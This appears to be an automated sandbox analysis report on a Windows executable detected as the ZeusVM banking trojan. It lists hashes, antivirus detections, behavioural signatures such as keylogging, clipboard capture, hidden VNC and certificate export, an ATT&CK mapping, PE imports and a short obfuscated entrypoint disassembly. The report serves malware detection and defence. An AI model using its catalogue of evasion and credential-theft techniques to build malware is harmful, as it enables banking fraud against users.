Play interactive tour

Edit tour

Analysis Report 7FzERy9xWc

Overview

General Information

Sample Name:	7FzERy9xWc (renamed file extension from none to exe)
Analysis ID:	385074
MD5:	8f250f634de721fec7b002a805dddc24
SHA1:	8e177de1f0ec9d45417b27e47973b8ded74242c7
SHA256:	5971fcdcf0f563f502c8ab017f34567c15e3e76c7a3c1497ae8513c305f77798
Tags:	uncategorized
Infos:
Most interesting Screenshot:

Detection

ZeusVM

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected ZeusVM e-Banking Trojan

Multi AV Scanner detection for submitted file

Contains VNC / remote desktop functionality (version string found)

Machine Learning detection for sample

Antivirus or Machine Learning detection for unpacked file

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

May initialize a security null descriptor

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

7FzERy9xWc.exe (PID: 2788 cmdline: 'C:\Users\user\Desktop\7FzERy9xWc.exe' MD5: 8F250F634DE721FEC7B002A805DDDC24)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: 7FzERy9xWc.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: 7FzERy9xWc.exe	Virustotal: Detection: 87%			Perma Link
Source: 7FzERy9xWc.exe	ReversingLabs: Detection: 92%

Machine Learning detection for sample

Show sources

Source: 7FzERy9xWc.exe

Joe Sandbox ML: detected

Source: 0.0.7FzERy9xWc.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen
Source: 0.2.7FzERy9xWc.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen

Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00412470 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,		0_2_00412470
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_0041FB50 HeapAlloc,CryptUnprotectData,LocalFree,HeapFree,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,		0_2_0041FB50

Source: 7FzERy9xWc.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_0040FEA0 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,PathCombineW,VirtualFree,CloseHandle,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,VirtualFree,CloseHandle,

0_2_0040FEA0

Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_004185D0 PathCombineW,MultiByteToWideChar,PathRemoveFileSpecW,PathCombineW,PathCombineW,SetFileAttributesW,FindFirstFileW,DeleteFileW,PathCombineW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_004185D0
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00418700 PathCombineW,FindFirstFileW,WaitForSingleObject,PathMatchSpecW,Sleep,PathCombineW,Sleep,FindNextFileW,FindClose,		0_2_00418700

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_00414C40 select,recv,

0_2_00414C40

Source: 7FzERy9xWc.exe	String found in binary or memory: http://www.google.com/webhp
Source: 7FzERy9xWc.exe, 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.google.com/webhpbcSeShutdownPrivilege

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_004239D0 GetClipboardData,WaitForSingleObject,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock,

0_2_004239D0

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_00423840 WaitForSingleObject,EnterCriticalSection,GetTickCount,LeaveCriticalSection,TranslateMessage,GetKeyboardState,ToUnicode,TranslateMessage,

0_2_00423840

Source: 7FzERy9xWc.exe, 00000000.00000002.201329272.000000000077A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan

Show sources

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_0041A850 lstrcmpiA,lstrcmpiA,lstrcmpiA,setsockopt,WSAIoctl,HeapFree,select,WSASetLastError,HeapAlloc,SetLastError,HeapFree,HeapFree,CreateThread,shutdown,closesocket,WaitForMultipleObjects,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,ReleaseMutex,CloseHandle,HeapFree,

0_2_0041A850

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_0041A370 send,OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,CloseDesktop,CloseWindowStation,

0_2_0041A370

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_00412C70 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

0_2_00412C70

Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_0041D940 VirtualFree,CloseHandle,CreateMutexW,GetLastError,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,OpenMutexW,GetFileAttributesExW,ReadProcessMemory,CloseHandle,Sleep,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ReleaseMutex,CloseHandle,HeapFree,		0_2_0041D940
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_0040E230 ExitWindowsEx,InitiateSystemShutdownExW,ExitWindowsEx,		0_2_0040E230

Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_0040AC10	0_2_0040AC10
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_004140B0	0_2_004140B0
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00414990	0_2_00414990
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00416E10	0_2_00416E10
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00408E30	0_2_00408E30
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_004022C3	0_2_004022C3
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00416AB0	0_2_00416AB0
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00412360	0_2_00412360
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00412374	0_2_00412374
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_0040F3FD	0_2_0040F3FD

Source: 7FzERy9xWc.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 7FzERy9xWc.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal72.bank.troj.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00423460 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,		0_2_00423460
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_004232A0 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertCloseStore,PFXExportCertStoreEx,PFXExportCertStoreEx,HeapAlloc,PFXExportCertStoreEx,CharLowerW,GetSystemTime,HeapFree,CertCloseStore,		0_2_004232A0

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_004129B0 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

0_2_004129B0

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_00412930 CreateToolhelp32Snapshot,Thread32First,Thread32Next,Thread32Next,CloseHandle,

0_2_00412930

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_00420440 CoCreateInstance,HeapFree,

0_2_00420440

Source: 7FzERy9xWc.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7FzERy9xWc.exe	Virustotal: Detection: 87%
Source: 7FzERy9xWc.exe	ReversingLabs: Detection: 92%

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_00412C70 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

0_2_00412C70

Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00409CFB push eax; iretd	0_2_00409CDD
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00409C70 push eax; iretd	0_2_00409CDD
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00402C19 push cs; iretd	0_2_00402C28
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00409CB9 push eax; iretd	0_2_00409CDD
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_0040254D push es; iretd	0_2_0040255C
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00402BE3 push cs; ret	0_2_00402BF8

Source: initial sample

Static PE information: section name: .text entropy: 7.96218490454

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_0041E910 VirtualProtect,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_0041E910

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_004185D0 PathCombineW,MultiByteToWideChar,PathRemoveFileSpecW,PathCombineW,PathCombineW,SetFileAttributesW,FindFirstFileW,DeleteFileW,PathCombineW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_004185D0
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00418700 PathCombineW,FindFirstFileW,WaitForSingleObject,PathMatchSpecW,Sleep,PathCombineW,Sleep,FindNextFileW,FindClose,		0_2_00418700

Source: 7FzERy9xWc.exe, 00000000.00000002.201329272.000000000077A000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_00412C70 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

0_2_00412C70

Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00409D89 mov eax, dword ptr fs:[00000030h]		0_2_00409D89
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_0041C4F0 mov edx, dword ptr fs:[00000030h]		0_2_0041C4F0

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_0041CAF0 HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetCurrentProcessId,

0_2_0041CAF0

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_00415510 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

0_2_00415510

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_004234C0 PFXImportCertStore,GetSystemTime,

0_2_004234C0

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_0040C999 HeapFree,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,

0_2_0040C999

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_00410960 GetTimeZoneInformation,

0_2_00410960

Source: C:\Users\user\Desktop\7FzERy9xWc.exe

Code function: 0_2_0041D000 GetComputerNameW,GetVersionExW,

0_2_0041D000

Source: 7FzERy9xWc.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)

Show sources

Source: 7FzERy9xWc.exe	String found in binary or memory: RFB 003.003
Source: 7FzERy9xWc.exe	String found in binary or memory: RFB 003.003

Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00415030 socket,bind,listen,closesocket,	0_2_00415030
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00406D40 WaitForSingleObject,socket,bind,GetTickCount,socket,bind,listen,closesocket,CreateEventW,WSAEventSelect,CloseHandle,shutdown,closesocket,getsockname,shutdown,closesocket,CloseHandle,	0_2_00406D40
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00414EE0 socket,bind,listen,closesocket,	0_2_00414EE0
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00414F40 socket,socket,bind,GetTickCount,socket,bind,listen,closesocket,	0_2_00414F40
Source: C:\Users\user\Desktop\7FzERy9xWc.exe	Code function: 0_2_00415320 socket,bind,closesocket,	0_2_00415320

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Native API1	Create Account1	Valid Accounts1	Valid Accounts1	Input Capture21	Network Share Discovery1	Remote Desktop Protocol1	Input Capture21	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Valid Accounts1	Access Token Manipulation11	Access Token Manipulation11	LSASS Memory	System Time Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Remote Access Software1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Application Shimming1	Application Shimming1	Obfuscated Files or Information2	Security Account Manager	Security Software Discovery11	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Install Root Certificate1	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing3	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
7FzERy9xWc.exe	88%	Virustotal		Browse
7FzERy9xWc.exe	92%	ReversingLabs	Win32.Trojan.Zeus
7FzERy9xWc.exe	100%	Avira	TR/Spy.Gen
7FzERy9xWc.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.7FzERy9xWc.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen		Download File
0.2.7FzERy9xWc.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385074
Start date:	11.04.2021
Start time:	15:49:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	7FzERy9xWc (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.bank.troj.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 32.2% (good quality ratio 30.7%) Quality average: 80.9% Quality standard deviation: 25.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	MS-DOS executable
Entropy (8bit):	7.912987012643321
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% DOS Executable Borland Pascal 7.0x (2037/25) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	7FzERy9xWc.exe
File size:	188928
MD5:	8f250f634de721fec7b002a805dddc24
SHA1:	8e177de1f0ec9d45417b27e47973b8ded74242c7
SHA256:	5971fcdcf0f563f502c8ab017f34567c15e3e76c7a3c1497ae8513c305f77798
SHA512:	d42a259868824429c4d6c7ed4aa5de1ddb3805d300feb39b51480a5232c0c05a74d9f27266ce60a796545f23e5de75896a8aa871ed93e5ab73ec01647175c191
SSDEEP:	3072:k8pY9M8j32Jwk95kLvkIuBEn/VnEXC1gDtfgBtW8cNhSw4L7Qpo977jurOC:k9j3SwOucIWX1fI6NATF9n6rp
File Content Preview:	MZ..............................................................................................................................................................................................................................PE..L...YJ.P...................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x41dd30
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x50164A59 [Mon Jul 30 08:48:25 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	87b3a93d03af93f2e664ed65d7224e1a

Entrypoint Preview

Instruction
push 00409D4Bh
ret
or al, FCh
adc al, ADh
xchg eax, ecx
mov esp, C114C940h
add ecx, dword ptr [edi-62h]
push edx
xchg eax, edx
jmp 00007F50B208EC5Fh
cmc
fldcw word ptr [edx-71h]
paddsw mm5, qword ptr [ebp+79725C5Dh]
aas
cmp bl, byte ptr [ecx+edi*2]
clc

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2a364	0x118	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x30000	0x1eb4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x5a0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2b244	0x2b400	False	0.956478052746	data	7.96218490454	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x2d000	0x2054	0x400	False	0.2080078125	data	1.53050726795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x30000	0x23f4	0x2400	False	0.709418402778	data	6.27055584577	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	HeapDestroy, HeapCreate, Thread32Next, ReadFile, GetTimeZoneInformation, MultiByteToWideChar, GetTempPathW, GetFileSizeEx, OpenMutexW, VirtualAlloc, VirtualProtectEx, VirtualAllocEx, FindClose, LoadLibraryA, RemoveDirectoryW, FindNextFileW, VirtualProtect, CreateToolhelp32Snapshot, GetFileTime, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, GetSystemTime, WriteProcessMemory, GetNativeSystemInfo, GetThreadContext, GetProcessId, GetFileAttributesExW, GetCurrentThreadId, TlsGetValue, TlsSetValue, TerminateProcess, GetCommandLineW, SetErrorMode, GetComputerNameW, OpenEventW, DuplicateHandle, GetCurrentProcessId, GlobalLock, GlobalUnlock, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, TlsAlloc, TlsFree, CreateRemoteThread, Process32FirstW, Process32NextW, SetFileAttributesW, WTSGetActiveConsoleSessionId, ReadProcessMemory, VirtualFreeEx, WideCharToMultiByte, Thread32First, OpenProcess, VirtualQueryEx, SetFileTime, IsBadReadPtr, GetProcessHeap, lstrcmpiA, LoadLibraryW, VirtualFree, HeapFree, SetFilePointerEx, SystemTimeToFileTime, HeapAlloc, CreateProcessW, SetEndOfFile, FindFirstFileW, CreateMutexW, HeapReAlloc, GetTempFileNameW, FileTimeToDosDateTime, GetEnvironmentVariableW, LocalFree, SetThreadContext, GetVersionExW, CreateDirectoryW, FreeLibrary, ExitProcess, SetThreadPriority, GetCurrentThread, ExpandEnvironmentStringsW, GetUserDefaultUILanguage, lstrcmpiW, GetModuleFileNameW, Sleep, GetTickCount, MoveFileExW, ResetEvent, SetLastError, GetLastError, SetEvent, EnterCriticalSection, GetProcAddress, GetPrivateProfileIntW, FlushFileBuffers, CreateFileW, GetFileAttributesW, LeaveCriticalSection, InitializeCriticalSection, WriteFile, GetPrivateProfileStringW, GetModuleHandleW, CloseHandle, WaitForMultipleObjects, CreateEventW, ReleaseMutex, CreateThread, WaitForSingleObject
USER32.dll	SwitchDesktop, DefDlgProcA, DefMDIChildProcA, ReleaseCapture, RegisterClassW, CallWindowProcA, CallWindowProcW, GetMessagePos, DefFrameProcW, RegisterClassA, EndPaint, GetUpdateRgn, GetMessageW, GetWindowDC, FillRect, PostMessageW, GetWindowInfo, DefMDIChildProcW, BeginPaint, GetUpdateRect, IntersectRect, GetDCEx, PostThreadMessageW, EqualRect, PrintWindow, ToUnicode, DefWindowProcW, IsRectEmpty, CharLowerBuffA, CreateDesktopW, SetProcessWindowStation, GetWindowRect, GetParent, GetKeyboardState, GetClassLongW, GetAncestor, SetWindowPos, IsWindow, MapWindowPoints, RegisterWindowMessageW, GetMenuItemID, SetKeyboardState, GetSubMenu, MenuItemFromPoint, GetMenu, GetMenuItemRect, TrackPopupMenuEx, SystemParametersInfoW, GetClassNameW, GetMenuState, GetMenuItemCount, HiliteMenuItem, EndMenu, GetWindowThreadProcessId, CharLowerW, MapVirtualKeyW, DefWindowProcA, DrawIcon, GetShellWindow, DrawEdge, GetIconInfo, GetCursorPos, RegisterClassExA, SetCapture, GetSystemMetrics, ExitWindowsEx, DefDlgProcW, DefFrameProcA, OpenInputDesktop, GetCapture, GetThreadDesktop, CloseWindowStation, CreateWindowStationW, GetProcessWindowStation, OpenDesktopW, CloseDesktop, SetThreadDesktop, GetUserObjectInformationW, OpenWindowStationW, GetTopWindow, LoadImageW, MsgWaitForMultipleObjects, WindowFromPoint, GetDC, TranslateMessage, GetWindowLongW, CharLowerA, RegisterClassExW, SetCursorPos, GetClipboardData, PeekMessageA, SendMessageW, CharToOemW, DispatchMessageW, GetWindow, SendMessageTimeoutW, SetWindowLongW, CharUpperW, ReleaseDC, PeekMessageW, GetMessageA
ADVAPI32.dll	InitiateSystemShutdownExW, EqualSid, ConvertSidToStringSidW, CryptGetHashParam, OpenProcessToken, GetSidSubAuthority, CryptAcquireContextW, OpenThreadToken, GetSidSubAuthorityCount, GetTokenInformation, RegCreateKeyExW, CryptReleaseContext, RegQueryValueExW, CreateProcessAsUserW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetNamedSecurityInfoW, LookupPrivilegeValueW, CryptCreateHash, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegOpenKeyExW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, RegCloseKey, RegSetValueExW, CryptHashData, IsWellKnownSid, GetLengthSid, RegEnumKeyExW
SHLWAPI.dll	PathQuoteSpacesW, PathRenameExtensionW, StrStrIW, StrStrIA, wvnsprintfA, StrCmpNIA, PathMatchSpecW, PathRemoveBackslashW, PathUnquoteSpacesW, PathAddExtensionW, PathCombineW, SHDeleteKeyW, PathSkipRootW, SHDeleteValueW, PathAddBackslashW, PathFindFileNameW, PathIsDirectoryW, wvnsprintfW, UrlUnescapeA, StrCmpNIW, PathIsURLW, PathRemoveFileSpecW
SHELL32.dll	ShellExecuteW, SHGetFolderPathW, CommandLineToArgvW
Secur32.dll	GetUserNameExW
ole32.dll	StringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
GDI32.dll	CreateCompatibleDC, SetRectRgn, SaveDC, DeleteDC, SetViewportOrgEx, RestoreDC, CreateDIBSection, GetDeviceCaps, GetDIBits, CreateCompatibleBitmap, GdiFlush, SelectObject, DeleteObject
WS2_32.dll	recv, sendto, select, getaddrinfo, recvfrom, getpeername, listen, send, WSASend, WSAIoctl, connect, WSAAddressToStringW, WSAStartup, shutdown, setsockopt, bind, socket, WSASetLastError, freeaddrinfo, WSAEventSelect, getsockname, accept, WSAGetLastError, closesocket
CRYPT32.dll	CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertCloseStore, CertOpenSystemStoreW, CertDeleteCertificateFromStore, CryptUnprotectData, PFXImportCertStore, PFXExportCertStoreEx
